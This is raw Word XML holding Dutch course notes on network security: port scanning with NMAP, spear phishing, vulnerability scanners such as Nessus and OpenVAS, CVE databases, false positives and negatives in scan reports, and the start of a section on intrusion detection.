                  <wp:extent cx="2319305" cy="1596345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09" cy="172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B3E4" w14:textId="1FC88F25" w:rsidR="00BF216D" w:rsidRDefault="004242DA" w:rsidP="004242DA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Port</w:t>
      </w:r>
      <w:r w:rsidR="00654EC9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Scanners</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F918CA6" w14:textId="77777777" w:rsidR="00654EC9" w:rsidRDefault="00654EC9" w:rsidP="00654EC9"/>
    <w:p w14:paraId="397CE97C" w14:textId="0816183C" w:rsidR="00654EC9" w:rsidRDefault="00654EC9" w:rsidP="00654EC9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Random attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2195CF" w14:textId="77777777" w:rsidR="00654EC9" w:rsidRDefault="00654EC9" w:rsidP="00654EC9"/>
    <w:p w14:paraId="7DCD96E4" w14:textId="3A8ABFAD" w:rsidR="00654EC9" w:rsidRDefault="00654EC9" w:rsidP="00654EC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Doe je met een met software zoals </w:t>
      </w:r>
      <w:r w:rsidRPr="00654EC9">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>NMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6004FDD5" w14:textId="77E82DE1" w:rsidR="00654EC9" w:rsidRDefault="00654EC9" w:rsidP="00654EC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Meest gebruikt!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AC75A3" w14:textId="058822CC" w:rsidR="00654EC9" w:rsidRDefault="00654EC9" w:rsidP="00654EC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Blok IP-addressen om te controleren</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D29BEC3" w14:textId="1EDC3ABC" w:rsidR="00654EC9" w:rsidRDefault="00654EC9" w:rsidP="00654EC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Geeft aan welke verbonden zijn, welke poorten opsten, welk OS er gebruikt wordt, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ABAB6C" w14:textId="77777777" w:rsidR="00654EC9" w:rsidRDefault="00654EC9" w:rsidP="00654EC9"/>
    <w:p w14:paraId="7B6144FE" w14:textId="5DA0B411" w:rsidR="00654EC9" w:rsidRDefault="00654EC9" w:rsidP="00654EC9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Spear Phishing Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7928CA50" w14:textId="77777777" w:rsidR="00654EC9" w:rsidRDefault="00654EC9" w:rsidP="00654EC9"/>
    <w:p w14:paraId="2CE64C9C" w14:textId="6553724C" w:rsidR="00654EC9" w:rsidRDefault="00654EC9" w:rsidP="00654EC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hacker heeft het op 1 persoon gemunt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FC4E45" w14:textId="48770119" w:rsidR="00654EC9" w:rsidRDefault="00654EC9" w:rsidP="00654EC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Rol binnen een bedrijf, roem, sociale status, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D54C784" w14:textId="67056FA1" w:rsidR="00654EC9" w:rsidRDefault="00654EC9" w:rsidP="00654EC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hacket doet uitgebreid onderzoek naar u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1871F660" w14:textId="77777777" w:rsidR="00654EC9" w:rsidRDefault="00654EC9" w:rsidP="00654EC9"/>
    <w:p w14:paraId="0A8B3B62" w14:textId="1A71D082" w:rsidR="00654EC9" w:rsidRDefault="00654EC9" w:rsidP="00654EC9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Portscan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B58BDA8" w14:textId="77777777" w:rsidR="00654EC9" w:rsidRDefault="00654EC9" w:rsidP="00654EC9"/>
    <w:p w14:paraId="367092E0" w14:textId="131F8095" w:rsidR="00654EC9" w:rsidRDefault="00654EC9" w:rsidP="00654EC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Kijken welke poorten openstaan op 1 host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106523EA" w14:textId="77777777" w:rsidR="00654EC9" w:rsidRDefault="00654EC9" w:rsidP="00654EC9"/>
    <w:p w14:paraId="4729E202" w14:textId="2CD04117" w:rsidR="00654EC9" w:rsidRDefault="00654EC9" w:rsidP="00654EC9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Portsweep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5DEB71" w14:textId="77777777" w:rsidR="00654EC9" w:rsidRDefault="00654EC9" w:rsidP="00654EC9"/>
    <w:p w14:paraId="4A1E30F5" w14:textId="7879E82C" w:rsidR="00654EC9" w:rsidRDefault="00654EC9" w:rsidP="00654EC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Kijken welke specifieke poort openstaat op meerdere hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71056ED5" w14:textId="77777777" w:rsidR="00654EC9" w:rsidRDefault="00654EC9" w:rsidP="00654EC9"/>
    <w:p w14:paraId="06E197DF" w14:textId="178BF54B" w:rsidR="00654EC9" w:rsidRDefault="00654EC9" w:rsidP="00654EC9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc453378507"/>
      <w:r>
        <w:t>Vulnerability Scanners</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="633C630D" w14:textId="77777777" w:rsidR="005E3243" w:rsidRDefault="005E3243" w:rsidP="005E3243"/>
    <w:p w14:paraId="3E894E41" w14:textId="0C38C718" w:rsidR="005E3243" w:rsidRDefault="005E3243" w:rsidP="00654EC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= Port Scanner + DB die kwetsbaarheden bevat + Rapport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793A9817" w14:textId="0755C8BB" w:rsidR="005E3243" w:rsidRDefault="005E3243" w:rsidP="00654EC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hier gebruik je software voor zoals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1840C1C1" w14:textId="54991CB8" w:rsidR="005E3243" w:rsidRDefault="005E3243" w:rsidP="005E3243">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ISS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545C5C37" w14:textId="764A93DA" w:rsidR="005E3243" w:rsidRDefault="005E3243" w:rsidP="005E3243">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Internet Security Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01026995" w14:textId="10EFA367" w:rsidR="005E3243" w:rsidRDefault="005E3243" w:rsidP="005E3243">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SATAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26170549" w14:textId="1C7EEA19" w:rsidR="005E3243" w:rsidRDefault="005E3243" w:rsidP="005E3243">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Security Administrator Tool for Analyzing Networks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE7741C" w14:textId="79B08455" w:rsidR="005E3243" w:rsidRDefault="005E3243" w:rsidP="005E3243">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Beter dan ISS</w:t>
      </w:r>
      <w:r w:rsidR="006964E2">
        <w:t xml:space="preserve"> = Hype</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C329B5B" w14:textId="4889BFE2" w:rsidR="005E3243" w:rsidRDefault="00AC31FA" w:rsidP="00AC31FA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Scanmechanisme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BFF0E7" w14:textId="77777777" w:rsidR="00AC31FA" w:rsidRDefault="00AC31FA" w:rsidP="00AC31FA"/>
    <w:p w14:paraId="67932594" w14:textId="2876CD8D" w:rsidR="00AC31FA" w:rsidRDefault="00F97A8D" w:rsidP="00F97A8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bepaalt welke poorten openstaat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E91FD4" w14:textId="6CC57873" w:rsidR="00F97A8D" w:rsidRDefault="00F97A8D" w:rsidP="00F97A8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bepaalt welke service er achter een poort draait</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B86346" w14:textId="6EAAD613" w:rsidR="00F97A8D" w:rsidRDefault="00F97A8D" w:rsidP="00F97A8D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F97A8D">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>= BANNER-GRABBING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE39250" w14:textId="7301ACF8" w:rsidR="00F97A8D" w:rsidRDefault="00F97A8D" w:rsidP="00F97A8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Message Of The Day (bv bij Cisco devices)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A07ACDF" w14:textId="77777777" w:rsidR="00F97A8D" w:rsidRDefault="00F97A8D" w:rsidP="00F97A8D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="105A4B26" w14:textId="2255A0D4" w:rsidR="00F97A8D" w:rsidRDefault="00F97A8D" w:rsidP="00F97A8D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Kwetsbaarheid DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237FC845" w14:textId="77777777" w:rsidR="00F97A8D" w:rsidRDefault="00F97A8D" w:rsidP="00F97A8D"/>
    <w:p w14:paraId="7832D010" w14:textId="71F4C7EC" w:rsidR="00F97A8D" w:rsidRDefault="00F97A8D" w:rsidP="00F97A8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Interne DB met info over zwakke plekken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3734718C" w14:textId="537CFC54" w:rsidR="00F97A8D" w:rsidRDefault="00F97A8D" w:rsidP="00F97A8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bevat CVE’s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA9144F" w14:textId="150B73DB" w:rsidR="00F97A8D" w:rsidRDefault="00F97A8D" w:rsidP="00F97A8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Common Vulnerabilities and Exposures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE9165A" w14:textId="0755D79D" w:rsidR="00F97A8D" w:rsidRDefault="00F97A8D" w:rsidP="00F97A8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>CVE-2012-1650</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73686775" w14:textId="4612B419" w:rsidR="00F97A8D" w:rsidRDefault="00F97A8D" w:rsidP="00F97A8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Metasploit – Armitage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033D48ED" w14:textId="054F6770" w:rsidR="00F97A8D" w:rsidRDefault="00F97A8D" w:rsidP="00F97A8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Er is ook een Open Source versie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5693F5F4" w14:textId="369B7E13" w:rsidR="00921BE6" w:rsidRDefault="00F97A8D" w:rsidP="00F97A8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>OSVDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1643803E" w14:textId="3EF301CE" w:rsidR="00F97A8D" w:rsidRDefault="00921BE6" w:rsidP="00921BE6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Rapporten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7236E4C3" w14:textId="0E04DB50" w:rsidR="00921BE6" w:rsidRDefault="00921BE6" w:rsidP="00921BE6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Geven weer welke CVE’s er gevonden zijn en welke actie kan ondernomen worden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163F1B3E" w14:textId="1C7B82FE" w:rsidR="00921BE6" w:rsidRDefault="00921BE6" w:rsidP="00921BE6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Er kunnen false negatives en false positives tussen zitten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5E51F8" w14:textId="7C4A02B7" w:rsidR="00921BE6" w:rsidRDefault="00921BE6" w:rsidP="00921BE6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>FP = Beveiligingslek in het rapport, maar bestat niet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46566ABF" w14:textId="302BFCA1" w:rsidR="00921BE6" w:rsidRDefault="00921BE6" w:rsidP="00921BE6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>FN = Nog erger, geen lek in het rapport, maar hij bestaat wel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5724CF" w14:textId="77777777" w:rsidR="00921BE6" w:rsidRDefault="00921BE6" w:rsidP="00921BE6"/>
    <w:p w14:paraId="3B3380E2" w14:textId="41E42C67" w:rsidR="00921BE6" w:rsidRDefault="00921BE6" w:rsidP="00921BE6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Confusion Matrix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69883E23" w14:textId="77777777" w:rsidR="00921BE6" w:rsidRDefault="00921BE6" w:rsidP="00921BE6"/>
    <w:p w14:paraId="2AC4B2F0" w14:textId="402E75EB" w:rsidR="00921BE6" w:rsidRDefault="00921BE6" w:rsidP="00921BE6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>True Positive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08262F0E" w14:textId="49D184FA" w:rsidR="00921BE6" w:rsidRDefault="00921BE6" w:rsidP="00921BE6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>GOED!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE7E1E3" w14:textId="15E90728" w:rsidR="00921BE6" w:rsidRDefault="00921BE6" w:rsidP="00921BE6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability in Rapport = werkelijkheid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516E91E9" w14:textId="52C78FB5" w:rsidR="00921BE6" w:rsidRDefault="00921BE6" w:rsidP="00921BE6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>False Positive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124ACFB4" w14:textId="6375C76A" w:rsidR="00921BE6" w:rsidRDefault="00921BE6" w:rsidP="00921BE6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SLECHT!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0ED7B3" w14:textId="74AB7416" w:rsidR="00921BE6" w:rsidRDefault="00921BE6" w:rsidP="00921BE6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability in Rapport != werkelijkheid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E073CF" w14:textId="6FAA094E" w:rsidR="00921BE6" w:rsidRDefault="00921BE6" w:rsidP="00921BE6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>True Negative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D8E4D6" w14:textId="49E1C0BA" w:rsidR="00921BE6" w:rsidRDefault="00921BE6" w:rsidP="00921BE6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>GOED!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCFB1B8" w14:textId="24BDA531" w:rsidR="00921BE6" w:rsidRDefault="00921BE6" w:rsidP="00921BE6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Safe in Rapport = werkelijkheid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE105D8" w14:textId="6933ED5E" w:rsidR="00921BE6" w:rsidRDefault="00921BE6" w:rsidP="00921BE6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>False Negative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A76FF47" w14:textId="4C7A973F" w:rsidR="00921BE6" w:rsidRDefault="00921BE6" w:rsidP="00921BE6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SLECHT!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622BFC4A" w14:textId="787A7C6B" w:rsidR="00921BE6" w:rsidRDefault="00921BE6" w:rsidP="00921BE6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Safe in Rapport != werkelijkheid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1609291A" w14:textId="77777777" w:rsidR="00921BE6" w:rsidRDefault="00921BE6" w:rsidP="00921BE6"/>
    <w:p w14:paraId="7DF07720" w14:textId="627C55C7" w:rsidR="00921BE6" w:rsidRDefault="00921BE6" w:rsidP="00921BE6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00921BE6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56F39692" wp14:editId="59E452BA">
            <wp:extent cx="2458065" cy="1905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6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B83B1" w14:textId="77777777" w:rsidR="00921BE6" w:rsidRDefault="00921BE6" w:rsidP="00921BE6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AF5428F" w14:textId="4E07253D" w:rsidR="00921BE6" w:rsidRDefault="00921BE6" w:rsidP="00921BE6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Benchmarking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032C8555" w14:textId="77777777" w:rsidR="00921BE6" w:rsidRDefault="00921BE6" w:rsidP="00921BE6"/>
    <w:p w14:paraId="5E03BE22" w14:textId="7EE949CA" w:rsidR="00921BE6" w:rsidRDefault="00290F91" w:rsidP="00290F91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3645"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Nagaan of een Vulnerability Scanner geschikt is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C0C5CA" w14:textId="333D5446" w:rsidR="00290F91" w:rsidRDefault="00290F91" w:rsidP="00290F91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3645"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Enkel TP en TN = Perfect!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D6CDA2" w14:textId="4EA88960" w:rsidR="00290F91" w:rsidRDefault="00290F91" w:rsidP="00290F91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3645"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Enkel TP,TN en FP = Minder goed = meer werk = maar toch secure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7E0EFC" w14:textId="29AB6CF4" w:rsidR="00290F91" w:rsidRDefault="00290F91" w:rsidP="00290F91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3645"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>FN = slecht! = Vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00E233CE">
        <w:t xml:space="preserve"> niet ontdekt en je denkt je safe zit!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206D62D4" w14:textId="77777777" w:rsidR="00D91A5D" w:rsidRDefault="00D91A5D" w:rsidP="00D91A5D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3645"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1119E2D7" w14:textId="6DC7D725" w:rsidR="00BF21D8" w:rsidRDefault="00D91A5D" w:rsidP="00D91A5D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3645"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Een goede scanner is </w:t>
      </w:r>
      <w:r w:rsidRPr="00D91A5D">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Nessus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D91A5D">
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> OpenVAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAA92A0" w14:textId="51E28AD5" w:rsidR="00D91A5D" w:rsidRDefault="00BF21D8" w:rsidP="00BF21D8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:bookmarkStart w:id="19" w:name="_Toc453378508"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Intrusiedetectie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="26958A2C" w14:textId="77777777" w:rsidR="00BF21D8" w:rsidRDefault="00BF21D8" w:rsidP="00BF21D8"/>
    <w:p w14:paraId="7AF4E6D7" w14:textId="5AB31A73" w:rsidR="00BF21D8" w:rsidRDefault="006E1925" w:rsidP="006E1925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
